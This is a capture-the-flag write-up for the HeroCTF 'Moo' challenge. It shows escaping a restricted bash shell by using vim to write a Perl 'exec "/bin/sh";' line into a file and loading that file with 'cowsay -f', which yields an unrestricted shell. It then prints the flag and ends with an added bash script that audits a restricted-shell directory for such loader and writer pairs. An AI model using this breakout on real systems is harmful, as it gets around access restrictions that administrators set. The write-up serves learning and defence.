misc/Moo

We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag.

ssh -p 11380 dyn05.heroctf.fr
user@dyn05.heroctf.fr's password:
Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202
 ______________________________________________________
/ Welcome dear CTF player! You can read the flag with: \
\ /bin/sudo /bin/cat /flag.txt. Or can you?...         /
 ------------------------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

When we try to run the suggested command, we see we're in a restricted shell:

user@moo:~$ /bin/sudo /bin/cat /flag.txt
bash: /bin/sudo: restricted: cannot specify `/' in command names

Let's take a look at our environment with env:

bash: env: command not found

The next thing to do is look at what our PATH is set to:

user@moo:~$ echo $PATH
/usr/local/rbin

Attempting to update our PATH fails as well, because the variable is read-only:

user@moo:~$ PATH=/bin sudo id
bash: PATH: readonly variable
bash: sudo: command not found

Well, let's see what is actually available to us in the only directory on our PATH:

user@moo:~$ ls -la $PATH
total 24
drwxr-xr-x 1 root root 4096 Oct 25 18:18 .
drwxr-xr-x 1 root root 4096 Oct 25 18:18 ..
lrwxrwxrwx 1 root root   17 Oct 25 18:18 cowsay -> /usr/games/cowsay
lrwxrwxrwx 1 root root   18 Oct 25 18:18 dircolors -> /usr/bin/dircolors
lrwxrwxrwx 1 root root    7 Oct 25 18:18 ls -> /bin/ls
-rwxr-xr-x 1 root root  206 Oct 25 17:35 rbash
-rwxr-xr-x 1 root root   54 Oct 25 17:35 vim

This reveals a few things:

  • We are in a restricted bash shell
  • We have cowsay

So we use cowsay as the GTFOBin that it is; however, we cannot redirect output to create the file it needs. Luckily we have vim.

We use vim to put our breakout (exec "/bin/sh";) into a file named tmp. cowsay's -f option loads that file as a cow file, which is evaluated as Perl, so we can then run it with cowsay:

cowsay -f tmp x

This gives us a full unrestricted shell, and we can now cat the flag:

PATH=/bin 
Hero{s0m3_s4cr3d_c0w}
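
Seen from the defender's side, the directory listing above already contains the whole chain: one program that loads a user-supplied file as code and another that can create that file. The following audit script is an added example, not part of the original write-up or the challenge; the LOADERS and WRITERS lists are an assumed, minimal classification taken from this challenge, and the function names are hypothetical.

```bash
#!/usr/bin/env bash
# Added example, not from the write-up. The classification below is an
# assumed, minimal list built from this challenge; it is not exhaustive.
LOADERS="cowsay"   # runs a user-supplied file as code (cowsay -f loads Perl)
WRITERS="vim"      # creates that file without needing shell redirection

# classify NAME: print "loader", "writer", or nothing.
classify() {
    local n
    for n in $LOADERS; do
        if [ "$1" = "$n" ]; then echo loader; return 0; fi
    done
    for n in $WRITERS; do
        if [ "$1" = "$n" ]; then echo writer; return 0; fi
    done
    return 0
}

# audit_rbin DIR: print one finding per flagged entry, then a verdict line.
audit_rbin() {
    local dir entry target kind loaders writers
    dir=$1 loaders=0 writers=0
    for entry in "$dir"/*; do
        [ -e "$entry" ] || [ -L "$entry" ] || continue
        target=$entry
        if [ -L "$entry" ]; then
            target=$(readlink -f -- "$entry" 2>/dev/null || readlink -- "$entry")
        fi
        # Check the resolved target first so a renamed symlink is still caught,
        # then the entry name so a wrapper script named vim is caught too.
        kind=$(classify "${target##*/}")
        [ -n "$kind" ] || kind=$(classify "${entry##*/}")
        case $kind in
            loader) loaders=$((loaders + 1)) ;;
            writer) writers=$((writers + 1)) ;;
            *) continue ;;
        esac
        echo "$kind: ${entry##*/} -> $target"
    done
    if [ "$loaders" -gt 0 ] && [ "$writers" -gt 0 ]; then
        echo "verdict: breakout chain (file writer + code loader)"
    elif [ $((loaders + writers)) -gt 0 ]; then
        echo "verdict: review flagged entries"
    else
        echo "verdict: clean"
    fi
}

if [ "$#" -gt 0 ]; then audit_rbin "$1"; fi
```

Run against a directory like the /usr/local/rbin shown above, it would report cowsay as a loader and vim as a writer, which is the combination this challenge relies on.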